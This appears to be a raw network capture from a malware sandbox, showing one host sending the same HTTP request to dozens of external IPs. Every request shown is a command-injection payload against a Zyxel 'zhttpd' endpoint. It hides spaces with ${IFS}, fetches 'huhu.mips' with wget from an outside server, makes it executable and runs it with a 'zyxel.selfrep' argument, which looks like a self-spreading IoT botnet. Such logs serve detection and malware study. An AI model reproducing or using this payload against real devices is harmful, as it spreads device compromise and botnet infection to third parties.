                                                        Feb 2, 2024 06:20:59.725732088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1964192.168.2.1438482205.173.113.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725749016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1965192.168.2.1445804121.249.157.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725800037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1966192.168.2.144950094.10.242.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725822926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1967192.168.2.1432870185.145.153.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725861073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1968192.168.2.14521225.45.39.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725893021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1969192.168.2.145317634.251.170.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725917101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1970192.168.2.145893287.210.113.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.725990057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1971192.168.2.1444000139.95.75.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726011038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1972192.168.2.1438414139.195.182.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726046085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1973192.168.2.145161451.79.254.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726119995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1974192.168.2.145435095.6.116.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726155043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1975192.168.2.144533625.38.14.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726185083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1976192.168.2.144186050.242.163.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726210117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1977192.168.2.145415887.29.96.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726262093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1978192.168.2.1449434150.50.161.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726300955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1979192.168.2.1433714194.128.67.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726336002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1980192.168.2.1437124106.126.198.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726371050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1981192.168.2.1453658135.5.255.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726406097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1982192.168.2.145626481.146.241.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726454973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1983192.168.2.1459550131.171.14.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726485968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1984192.168.2.1443984119.199.24.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726538897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1985192.168.2.145475261.231.74.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726588011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1986192.168.2.1460026117.102.116.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726622105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1987192.168.2.144603468.206.39.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726665020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1988192.168.2.1453068220.57.255.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726706028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1989192.168.2.1446826170.34.99.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726732969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1990192.168.2.143761062.32.221.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726784945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1991192.168.2.1437398130.174.135.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726828098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1992192.168.2.143510662.35.185.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726871014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1993192.168.2.143390481.197.51.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726892948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1994192.168.2.1443092175.194.59.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726931095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1995192.168.2.1434006198.152.190.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.726959944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1996192.168.2.145656625.65.117.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727003098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1997192.168.2.145662095.230.171.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727025032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1998192.168.2.1448428138.9.224.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727082014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1999192.168.2.1436828162.225.139.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727098942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2000192.168.2.145827058.224.207.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727159023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2001192.168.2.1443560104.197.45.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727190018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2002192.168.2.1438282176.108.165.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727226019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2003192.168.2.145186086.177.86.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727243900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2004192.168.2.1451046210.140.15.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727263927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2005192.168.2.1445204164.114.40.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727303982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2006192.168.2.1452182171.90.56.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727339029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2007192.168.2.1447478199.92.44.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727364063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2008192.168.2.1443754200.185.85.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727389097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2009192.168.2.1455572145.240.96.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727422953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2010192.168.2.143379487.57.33.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727446079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2011192.168.2.144103468.167.148.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727477074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2012192.168.2.1439400220.29.223.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727513075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2013192.168.2.1454180103.225.157.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727555037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2014192.168.2.1460410168.82.41.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727591991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2015192.168.2.145454636.63.161.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727613926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2016192.168.2.1441164129.197.28.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727641106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2017192.168.2.1436688217.170.164.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727703094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2018192.168.2.1434192122.96.146.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727732897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2019192.168.2.1447296207.132.32.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727785110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2020192.168.2.143425813.21.217.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727809906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2021192.168.2.1445988130.245.202.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727850914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2022192.168.2.1448736209.14.25.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727901936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2023192.168.2.144178480.4.160.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727922916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2024192.168.2.1438018136.228.188.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727955103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2025192.168.2.1440024114.111.89.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:59.727992058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2026192.168.2.144174231.98.31.155443
                                                        TimestampBytes transferredDirectionData
